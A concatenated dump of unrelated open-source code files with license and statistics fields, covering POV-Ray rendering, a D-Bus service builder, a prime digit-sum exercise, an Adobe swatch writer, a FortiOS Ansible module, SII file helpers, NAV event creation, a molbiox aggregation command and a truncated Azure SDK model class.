write_pov_particle (f, x, y, z, a[j])
else:
write_pov_particle (f, x, y, z, 1.0)
else:
# bond
write_pov_particles_with_bonds (f, nc.np, pos, a, bond_radius)
# write fixed particles
for j in range(nc.npf):
x = xf0[j*3]
y = xf0[j*3+1]
z = xf0[j*3+2]
if af != []:
write_pov_particle_fixed (f, x, y, z, af[j])
else:
write_pov_particle_fixed (f, x, y, z, 1.0)
# done
f.close()
def main():
filename = ''
outfile = ''
flag_ball = 0
flag_bonds = 0
bond_radius = 0.0
bond_color = ''
sphere_radius = 0.0
cylinder_radius = 0.0
flag_bb = 0
camera_dist = 0.0
flag_lookat = 0
lk_x = 0.0
lk_y = 0.0
lk_z = 0.0
camera_dir = ''
step = -1
nsteps = 1
nm = 0
i = 1
while i < len(sys.argv):
if sys.argv[i] == '-f' or sys.argv[i] == '--file':
filename = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-o' or sys.argv[i] == '--out':
outfile = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-step':
step = int(sys.argv[i+1])
step -= 1
i += 2
elif sys.argv[i] == '-nsteps':
nsteps = int(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-ball':
flag_ball = 1
i += 1
elif sys.argv[i] == '-bonds':
flag_bonds = 1
i += 1
elif sys.argv[i] == '-br':
bond_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-bc':
bond_color = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-sphere':
sphere_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-cylinder':
cylinder_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-bbox':
flag_bb = 1
i += 1
elif sys.argv[i] == '-camera':
camera_dist = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-top':
camera_dir = 'top'
i += 1
elif sys.argv[i] == '-bottom':
camera_dir = 'bottom'
i += 1
elif sys.argv[i] == '-lookat':
flag_lookat = 1
lk_x = float(sys.argv[i+1])
lk_y = float(sys.argv[i+2])
lk_z = float(sys.argv[i+3])
i += 4
else:
usage()
if filename == '': usage()
if outfile == '': outfile = 'test'
str_argv = ''
for i in range(len(sys.argv)):
str_argv += ' %s'%(sys.argv[i])
nc = stokes.stokes_nc_open (filename)
#stokes.stokes_nc_print_actives(nc, stokes.get_stdout())
lattice = stokes.darray(3)
stokes.stokes_nc_get_array1d (nc, 'l', lattice)
# x[] : center of particles
pos = stokes.darray(nc.np * nc.nvec)
# q[] : quaternion
if nc.flag_q != 0:
q = stokes.darray(nc.np * nc.nquat)
else:
q = []
# a[] : radius of mobile particles
if nc.flag_a != 0:
a = stokes.darray(nc.np)
stokes.stokes_nc_get_array1d (nc, "a", a)
else:
a = []
# af[] : radius of fixed particles
if nc.flag_af != 0:
af = stokes.darray(nc.npf)
stokes.stokes_nc_get_array1d (nc, "af", af)
else:
af = []
# xf0[]
if nc.npf > 0:
xf0 = stokes.darray(nc.npf * nc.nvec)
stokes.stokes_nc_get_data0 (nc, "xf0", xf0)
else:
xf0 = []
if lattice[0] != 0.0 or lattice[1] != 0.0 or lattice[2] != 0.0:
# periodic boundary
if lattice[0] > lattice[2]:
l = lattice[0]
else:
l = lattice[2]
#camera = [0.5 * lattice[0], -1.7*l, 0.5 * lattice[2]]
#camera = [0.5 * lattice[0], -1.1*l, 0.5 * lattice[2]]
#lookat = [0.5 * lattice[0], 0.0, 0.5 * lattice[2]]
camera = [0.5 * lattice[0], -0.8*l, 0.28 * lattice[2]]
lookat = [0.5 * lattice[0], 0.0, 0.3 * lattice[2]]
# extract the config at the step
if step >= 0:
if step > nc.ntime:
print 'out of the range %d <= %d'%(step, nc.ntime)
sys.exit(1)
render_one_step(str_argv, outfile, step, nc,
pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, (lk_x, lk_y, lk_z),
camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb)
else:
nloop = nc.ntime / nsteps
for i in range(nloop):
ii = i * nsteps
print '%d step'%(ii)
render_one_step(str_argv, outfile, ii, nc,
pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, (lk_x, lk_y, lk_z),
camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb)
if __name__ == "__main__":
main()
|
gpl-2.0
| 2,668,609,146,056,144,000
| 30.730627
| 79
| 0.43571
| false
| 2.906377
| false
| false
| false
|
Tanmay28/coala
|
coalib/output/dbus/BuildDbusService.py
|
1
|
1436
|
from distutils.core import Command
from distutils.errors import DistutilsOptionError
from coalib.misc.Constants import Constants
class BuildDbusService(Command):
"""
Add a `build_dbus` command to your setup.py.
To use this Command class add a command to call this class::
# For setuptools
setup(
entry_points={
"distutils.commands": [
"build_dbus = "
"coalib.misc.BuildDbusService:BuildDbusService"
]
}
)
# For distutils
from coalib.misc.BuildDbusService import BuildDbusService
setup(
cmdclass={'build_dbus': BuildDbusService}
)
You can then use the following setup command to produce a dbus service::
$ python setup.py build_dbus
"""
user_options = [('output=', 'O', 'output file')]
def initialize_options(self):
self.output = None
def finalize_options(self):
if self.output is None:
raise DistutilsOptionError('\'output\' option is required')
self.announce('Writing dbus service %s' % self.output)
def run(self):
dist = self.distribution
dbus_service = ("[D-BUS Service]\n"
"Names=" + Constants.BUS_NAME + "\n"
"Exec=coala-dbus")
with open(self.output, 'w') as f:
f.write(dbus_service)
|
agpl-3.0
| 1,617,566,290,701,137,700
| 27.72
| 76
| 0.571727
| false
| 4.432099
| false
| false
| false
|
jorgebaier/iic1103-s4-2016
|
clase0830/suma_digitos_primos.py
|
1
|
1132
|
import math
def suma_digitos(numero):
suma = 0
while numero > 0:
suma = suma + numero%10
numero = numero // 10
return suma
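# For example (editor's note): suma_digitos(2016) == 9, since 2+0+1+6 = 9.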
def esPrimo(n):
i = 1
divisores = 0
while i <= n:
if n%i == 0:
divisores = divisores + 1
i = i + 1
return divisores == 2
def esPrimo2(n):
i = 2
if n < 2:
return False
while i < n:
if n%i == 0:
return False
i = i + 1
return True
def esPrimo3(n):
i = 2
if n < 2:
return False
while i <= math.sqrt(n):
if n%i == 0:
return False
i = i + 1
return True
def esPrimo4(n):
if n < 2:
return False
elif n == 2:
return True
if n%2 == 0:
return False
i = 3
while i <= math.sqrt(n):
if n%i == 0:
return False
i = i + 2
return True
limite = int(input("how many numbers do you want? "))
numero = 0
contador = 0
while contador < limite:
suma = suma_digitos(numero)
if esPrimo3(suma):
print(numero)
contador = contador + 1
numero = numero + 1
|
unlicense
| -9,141,152,381,898,231,000
| 16.6875
| 48
| 0.484982
| false
| 3.118457
| false
| false
| false
|
nsfmc/swatch
|
swatch/writer.py
|
1
|
4463
|
# encoding: utf-8
"""
swatch, a parser for adobe swatch exchange files
Copyright (c) 2014 Marcos A Ojeda http://generic.cx/
With notes from
http://iamacamera.org/default.aspx?id=109 and
http://www.colourlovers.com/ase.phps
All Rights Reserved
MIT Licensed, see LICENSE.TXT for details
"""
import logging
import struct
import os
def chunk_count(swatch):
"""return the number of byte-chunks in a swatch object
    this recursively walks the swatch list, returning 1 for a single color
    and, for each folder, 2 plus 1 for each color it contains
"""
if type(swatch) is dict:
if 'data' in swatch:
return 1
if 'swatches' in swatch:
return 2 + len(swatch['swatches'])
else:
return sum(map(chunk_count, swatch))
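# Worked example (editor's note): a folder counts as 2 chunks plus one per
# contained color, so for any two entries c1, c2:
#   chunk_count([{'swatches': [c1, c2]}]) == 4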
def chunk_for_object(obj):
type = obj.get('type')
if type == 'Color Group':
return chunk_for_folder(obj)
if type in ['Process', 'Spot', 'Global']:
return chunk_for_color(obj)
def chunk_for_color(obj):
"""builds up a byte-chunk for a color
the format for this is
b'\x00\x01' +
Big-Endian Unsigned Int == len(bytes that follow in this block)
• Big-Endian Unsigned Short == len(color_name)
in practice, because utf-16 takes up 2 bytes per letter
this will be 2 * (len(name) + 1)
so a color named 'foo' would be 8 bytes long
• UTF-16BE Encoded color_name terminated with '\0'
using 'foo', this yields '\x00f\x00o\x00o\x00\x00'
• A 4-byte char for Color mode ('RGB ', 'Gray', 'CMYK', 'LAB ')
note the trailing spaces
• a variable-length number of 4-byte length floats
this depends entirely on the color mode of the color.
• A Big-Endian short int for either a global, spot, or process color
global == 0, spot == 1, process == 2
    the chunk has no terminating string; although other sites have indicated
    that the global/spot/process short is a terminator, it's actually used
    to indicate how illustrator should deal with the color.
"""
title = obj['name'] + '\0'
title_length = len(title)
chunk = struct.pack('>H', title_length)
chunk += title.encode('utf-16be')
mode = obj['data']['mode'].encode()
values = obj['data']['values']
color_type = obj['type']
fmt = {b'RGB': '!fff', b'Gray': '!f', b'CMYK': '!ffff', b'LAB': '!fff'}
if mode in fmt:
padded_mode = mode.decode().ljust(4).encode()
chunk += struct.pack('!4s', padded_mode) # the color mode
chunk += struct.pack(fmt[mode], *values) # the color values
color_types = ['Global', 'Spot', 'Process']
if color_type in color_types:
color_int = color_types.index(color_type)
chunk += struct.pack('>h', color_int) # append swatch mode
chunk = struct.pack('>I', len(chunk)) + chunk # prepend the chunk size
return b'\x00\x01' + chunk # swatch color header
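# Editor's sketch: a minimal round-trip through chunk_for_color. The dict
# layout (name/type/data keys) is assumed from how this writer consumes the
# swatch objects above; this helper is not part of the original file.
def _demo_color_chunk():
    red = {'name': 'foo',
           'type': 'Process',
           'data': {'mode': 'RGB', 'values': [1.0, 0.0, 0.0]}}
    chunk = chunk_for_color(red)
    # b'\x00\x01' header, then a big-endian length of the body that follows
    assert chunk[:2] == b'\x00\x01'
    (body_len,) = struct.unpack('>I', chunk[2:6])
    assert body_len == len(chunk) - 6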
def chunk_for_folder(obj):
"""produce a byte-chunk for a folder of colors
the structure is very similar to a color's data:
• Header
b'\xC0\x01' +
Big Endian Unsigned Int == len(Bytes in the Header Block)
note _only_ the header, this doesn't include the length of color data
• Big Endian Unsigned Short == len(Folder Name + '\0')
Note that Folder Name is assumed to be utf-16be so this
will always be an even number
• Folder Name + '\0', encoded UTF-16BE
• body
chunks for each color, see chunk_for_color
• folder terminator
b'\xC0\x02' +
b'\x00\x00\x00\x00'
    Perhaps the four null bytes represent something, but I'm pretty sure
    they're just a terminating string; there's something nice about
    how the b'\xC0\x02' matches with the folder's header
"""
title = obj['name'] + '\0'
title_length = len(title)
chunk_body = struct.pack('>H', title_length) # title length
chunk_body += title.encode('utf-16be') # title
chunk_head = b'\xC0\x01' # folder header
chunk_head += struct.pack('>I', len(chunk_body))
# precede entire chunk by folder header and size of folder
chunk = chunk_head + chunk_body
chunk += b''.join([chunk_for_color(c) for c in obj['swatches']])
chunk += b'\xC0\x02' # folder terminator chunk
chunk += b'\x00\x00\x00\x00' # folder terminator
return chunk
|
mit
| -4,765,099,113,358,125,000
| 35.719008
| 79
| 0.622327
| false
| 3.583065
| false
| false
| false
|
amenonsen/ansible
|
lib/ansible/modules/network/fortios/fortios_system_replacemsg_nac_quar.py
|
1
|
10019
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_replacemsg_nac_quar
short_description: Replacement messages in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify system_replacemsg feature and nac_quar category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
system_replacemsg_nac_quar:
description:
- Replacement messages.
default: null
type: dict
suboptions:
buffer:
description:
- Message string.
type: str
format:
description:
- Format flag.
type: str
choices:
- none
- text
- html
- wml
header:
description:
- Header flag.
type: str
choices:
- none
- http
- 8bit
msg_type:
description:
- Message type.
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Replacement messages.
fortios_system_replacemsg_nac_quar:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
system_replacemsg_nac_quar:
buffer: "<your_own_value>"
format: "none"
header: "none"
msg_type: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_system_replacemsg_nac_quar_data(json):
option_list = ['buffer', 'format', 'header',
'msg_type']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
    if isinstance(data, list):
        for i, elem in enumerate(data):
            # rebinding the loop variable would not update the list; write
            # the converted element back in place
            data[i] = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
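# e.g. (editor's note) underscore_to_hyphen({'msg_type': 'x'}) returns
# {'msg-type': 'x'}, matching the hyphenated keys the FortiOS API expects.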
def system_replacemsg_nac_quar(data, fos):
vdom = data['vdom']
state = data['state']
system_replacemsg_nac_quar_data = data['system_replacemsg_nac_quar']
filtered_data = underscore_to_hyphen(filter_system_replacemsg_nac_quar_data(system_replacemsg_nac_quar_data))
if state == "present":
return fos.set('system.replacemsg',
'nac-quar',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('system.replacemsg',
'nac-quar',
mkey=filtered_data['msg-type'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_system_replacemsg(data, fos):
if data['system_replacemsg_nac_quar']:
resp = system_replacemsg_nac_quar(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"system_replacemsg_nac_quar": {
"required": False, "type": "dict", "default": None,
"options": {
"buffer": {"required": False, "type": "str"},
"format": {"required": False, "type": "str",
"choices": ["none", "text", "html",
"wml"]},
"header": {"required": False, "type": "str",
"choices": ["none", "http", "8bit"]},
"msg_type": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
gpl-3.0
| -8,324,616,875,064,963,000
| 28.72997
| 113
| 0.584489
| false
| 4.167637
| false
| false
| false
|
SCSSoftware/BlenderTools
|
addon/io_scs_tools/internals/containers/sii.py
|
1
|
7631
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2013-2017: SCS Software
import os
from io_scs_tools.utils import path as _path_utils
from io_scs_tools.utils.printout import lprint
from io_scs_tools.internals.containers.parsers import sii as _sii_reader
from io_scs_tools.internals.containers.writers import sii as _sii_writer
def get_data_from_file(filepath, is_sui=False):
"""Returns entire data in data container from specified SII definition file.
:param filepath: absolute file path where SII should be read from
:type filepath: str
:param is_sui: True if file should be read as SUI, in that case only one unit will be returned
:type is_sui: bool
    :return: list of SII Units if parsing succeeded; otherwise None
:rtype: list[io_scs_tools.internals.structure.UnitData] | None
"""
container = None
if filepath:
if os.path.isfile(filepath):
container = _sii_reader.parse_file(filepath, is_sui=is_sui)
if container:
if len(container) < 1:
lprint('D SII file "%s" is empty!', (_path_utils.readable_norm(filepath),))
return None
else:
lprint('D SII file "%s" is empty!', (_path_utils.readable_norm(filepath),))
return None
else:
lprint('W Invalid SII file path %r!', (_path_utils.readable_norm(filepath),))
else:
lprint('I No SII file path provided!')
return container
def write_data_to_file(filepath, container, is_sui=False, create_dirs=False):
"""Write given unit data container into SII file.
:param filepath: absolute file path where SII should be written to
:type filepath: str
:param container: iterable of unit data objects to be written
:type container: tuple[io_scs_tools.internals.structure.UnitData]|list[io_scs_tools.internals.structure.UnitData]
:param is_sui: True if unit should be written as SUI, meaning without SiiNunit header
:type is_sui: bool
:param create_dirs: True if directories should be created before export
:type create_dirs: bool
:return: True if container was successfully written; otherwise False
:rtype: bool
"""
file_type = "SUI" if is_sui else "SII"
if filepath:
if container:
return _sii_writer.write_data(filepath, container, is_sui=is_sui, create_dirs=create_dirs)
else:
lprint("W Empty %s container, abort file write: %r!", (file_type, _path_utils.readable_norm(filepath),))
else:
lprint('I No %s file path provided!', (file_type,))
return False
def has_valid_unit_instance(container, unit_type, req_props=tuple(), one_of_props=tuple(), unit_instance=0):
"""Valides unit instance with given unit type, required properties and one of properties lists.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
:param unit_type: type of the unit we are validating represented in string
:type unit_type: str
    :param req_props: required properties that have to be inside the unit instance for it to be valid
    :type req_props: iterable
    :param one_of_props: at least one property from this list has to be inside the unit instance for it to be valid
:type one_of_props: iterable
:param unit_instance: index of unit instance in container list that we are validating
:type unit_instance: int
:return: True if valid; False otherwise
:rtype: bool
"""
if container is None:
lprint("D Validation failed: None SII container!")
return False
# there should be only one unit instance inside file
if len(container) < unit_instance + 1:
lprint("D Validation failed: Not enough unit instances!")
return False
# invalid unit type
if unit_type != "" and container[unit_instance].type != unit_type:
lprint("D Validation failed: Invalid unit instance type!")
return False
for prop in req_props:
if prop not in container[unit_instance].props:
lprint("D Validation failed: Required prop %r not found!", (prop,))
return False
one_of_props_found = False
for prop in one_of_props:
if prop in container[unit_instance].props:
one_of_props_found = True
break
if not one_of_props_found and len(one_of_props) > 0:
lprint("D Validation failed: None property found from one of: %r!", (one_of_props,))
return False
return True
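# Illustrative usage (editor's note; the unit type and property names here
# are hypothetical examples, not taken from any real SII schema):
#
#   if has_valid_unit_instance(container, "accessory_addon_data",
#                              req_props=("look",)):
#       look = get_unit_property(container, "look")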
def get_unit_property(container, prop, unit_instance=0):
"""Gets property value from unit instance.
    NOTE: No validation is done that the unit instance exists in the container,
    so make sure to use the validation function beforehand.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
:param prop: name of the property we are looking for
:type prop: str
:param unit_instance: index of unit instance in container list that we are validating
:type unit_instance: int
    :return: None if the property is not found inside the unit instance; otherwise the value of the property
:rtype: None|any
"""
value = None
if prop in container[unit_instance].props:
value = container[unit_instance].props[prop]
return value
def get_direct_unit_property(unit, prop):
"""Gets property value from unit instance.
    NOTE: No validation is done that the unit instance exists in the container,
    so make sure to use the validation function beforehand.
:param unit: container as list of unit instances
:type unit: io_scs_tools.internals.structure.UnitData
:param prop: name of the property we are looking for
:type prop: str
    :return: None if the property is not found inside the unit instance; otherwise the value of the property
:rtype: None|any
"""
value = None
if prop in unit.props:
value = unit.props[prop]
return value
def get_unit_by_id(container, unit_id, unit_type):
"""Gets first found unit instance from container with given id and type.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
    :param unit_id: id of the unit we are searching for, e.g. ".truck.cabin"
:type unit_id: str
:param unit_type: type of the unit representing it's class name we are searching for
:type unit_type: str
:return: None if unit is not found; otherwise unit data representation of it's content
:rtype: None|io_scs_tools.internals.structure.UnitData
"""
unit = None
for unit_instance in range(0, len(container)):
if container[unit_instance].type != unit_type:
continue
if container[unit_instance].id != unit_id:
continue
unit = container[unit_instance]
break
return unit
|
gpl-2.0
| -3,206,173,954,677,148,700
| 36.406863
| 117
| 0.68261
| false
| 3.966216
| false
| false
| false
|
hmpf/nav
|
python/nav/event2.py
|
2
|
3807
|
#
# Copyright (C) 2015 Uninett AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details. You should have received a copy of the GNU General Public License
# along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""
Next generation event factory functionality for NAV, based on the Django ORM
models from nav.models.event.
"""
from __future__ import absolute_import
from django.utils import six
from nav.models.event import EventQueue
class EventFactory(object):
"""A factory for NAV event dispatching"""
def __init__(self, source, target, event_type,
start_type=None, end_type=None):
"""
Initialize a template for event generation.
:param source: An event source string (e.g. 'ipdevpoll')
:param target: An event target string (e.g. 'eventEngine')
:param event_type: An event type name.
:param start_type: An optional start alert type hint for eventengine
:param end_type: An optional end alert type hint for eventengine
"""
self.source = source
self.target = target
self.event_type = event_type
self.start_type = start_type
self.end_type = end_type
def base(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns an event base template
:param device: A nav.models.manage.Device object or primary key.
:param netbox: A nav.models.manage.Netbox object or primary key.
:param subid: A subid string, if applicable.
:param varmap: A dictionary of arbitrary event variables to attach.
        :param alert_type: An optional alert type hint for eventEngine; useful
for cases where eventEngine has no specific plugin.
:return:
"""
event = EventQueue()
event.source_id = self.source
event.target_id = self.target
event.event_type_id = self.event_type
if isinstance(device, int):
event.device_id = device
else:
event.device = device
if isinstance(netbox, int):
event.netbox_id = netbox
else:
event.netbox = netbox
event.subid = six.text_type(subid)
var = dict(varmap or {})
if alert_type:
var['alerttype'] = alert_type
event.varmap = var
return event
def start(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns a start event"""
event = self.base(device, netbox, subid, varmap,
alert_type or self.start_type)
event.state = event.STATE_START
return event
def end(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns an end event"""
event = self.base(device, netbox, subid, varmap,
alert_type or self.end_type)
event.state = event.STATE_END
return event
def notify(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns a stateless event"""
event = self.base(device, netbox, subid, varmap,
alert_type or self.start_type)
        # the original assigned STATE_STATELESS to event_type, which would
        # clobber the event type; the state attribute is the likely target
        event.state = event.STATE_STATELESS
return event
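# Illustrative usage (editor's note; the source/target/type strings are
# hypothetical examples, not values mandated by NAV):
#
#   linkstate = EventFactory('ipdevpoll', 'eventEngine', 'linkState',
#                            start_type='linkDown', end_type='linkUp')
#   event = linkstate.start(netbox=1, subid='42')
#   event.save()  # enqueues the event for eventEngine to process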
|
gpl-3.0
| -7,836,915,006,604,692,000
| 35.605769
| 79
| 0.628054
| false
| 4.076017
| false
| false
| false
|
frozflame/molbiox
|
molbiox/execute/relational.py
|
1
|
3111
|
#!/usr/bin/env python3
# coding: utf-8
from __future__ import unicode_literals, print_function
import sys
import itertools
from molbiox.frame.command import Command
from molbiox.io import blast, tabular
"""
If your results come from more than 2 columns, use a SQL database instead.
"""
class CommandAggregate(Command):
abbr = 'ag'
name = 'aggregate'
desc = 'apply an aggregation function to a tabular text file'
@classmethod
def register(cls, subparser):
subparser = super(cls, cls).register(subparser)
subparser.add_argument(
'--subsep', metavar='character',
help="seperator used on subject names")
subparser.add_argument(
'-f', '--function', metavar='string', default='count',
choices=['count', 'list', 'set', 'avg', 'var', 'std'],
help='name of the aggregation function')
subparser.add_argument(
'-k', '--key', metavar='integer', default=0,
help='group by this column ')
subparser.add_argument(
'-v', '--val', metavar='integer', default=0,
help='apply aggregation function on this column')
subparser.add_argument(
'--ksort', metavar='string', choices=['alpha', 'num'],
help='sort keys alphabetically or numerically')
subparser.add_argument(
'--vsort', metavar='string', choices=['alpha', 'num'],
help='sort values alphabetically or numerically')
subparser.add_argument(
'-m', '--limit', type=int,
help='set max number of hits listed for each query')
return subparser
@classmethod
def render(cls, args, outfile):
recgens = [tabular.read(fn) for fn in args.filenames]
records = itertools.chain(*recgens)
        # the original passed 'aggregator' to its own constructor before the
        # name existed (a NameError); the chained records are the likely input
        aggregator = tabular.Aggregator(records)
if args.function == 'count':
# groups = aggregator
pass
@classmethod
def render_(cls, args, outfile):
if args.format != '6m':
sys.exit('currently only blast6mini')
# TODO: decide what func to use based on -f option
func = blast.read_fmt6m
# a list of generators, then chain them
recgens = [func(fn) for fn in args.filenames]
records = itertools.chain(*recgens)
querydic = blast.aggregate(records, subsep=args.subsep)
if args.sort:
pairs = ((k, querydic[k]) for k in sorted(querydic))
else:
pairs = ((k, querydic[k]) for k in querydic)
if args.list:
for k, v in pairs:
v = sorted(v) if args.sort else v
v = itertools.islice(v, args.limit) if args.limit else v
subj = ' '.join(v)
print(k, subj, sep='\t', file=outfile)
else:
for k, v in querydic.items():
print(len(v), k, sep='\t', file=outfile)
@classmethod
def get_agg_func(cls, name):
"""
Get a function which returns a dict-like object
:param name:
:return:
"""
pass
|
gpl-2.0
| 1,638,024,055,608,239,600
| 32.095745
| 74
| 0.573449
| false
| 4.04026
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/cognitiveservices/azure-cognitiveservices-search-visualsearch/azure/cognitiveservices/search/visualsearch/models/rating.py
|
1
|
2017
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .properties_item import PropertiesItem
class Rating(PropertiesItem):
"""Defines a rating.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AggregateRating
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param _type: Required. Constant filled by server.
:type _type: str
:param rating_value: Required. The mean (average) rating. The possible
values are 1.0 through 5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0
through 5.0.
:vartype best_rating: float
"""
_validation = {
'text': {'readonly': True},
'_type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'_type': {'key': '_type', 'type': 'str'},
'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
}
_subtype_map = {
'_type': {'AggregateRating': 'AggregateRating'}
}
def __init__(self, **kwargs):
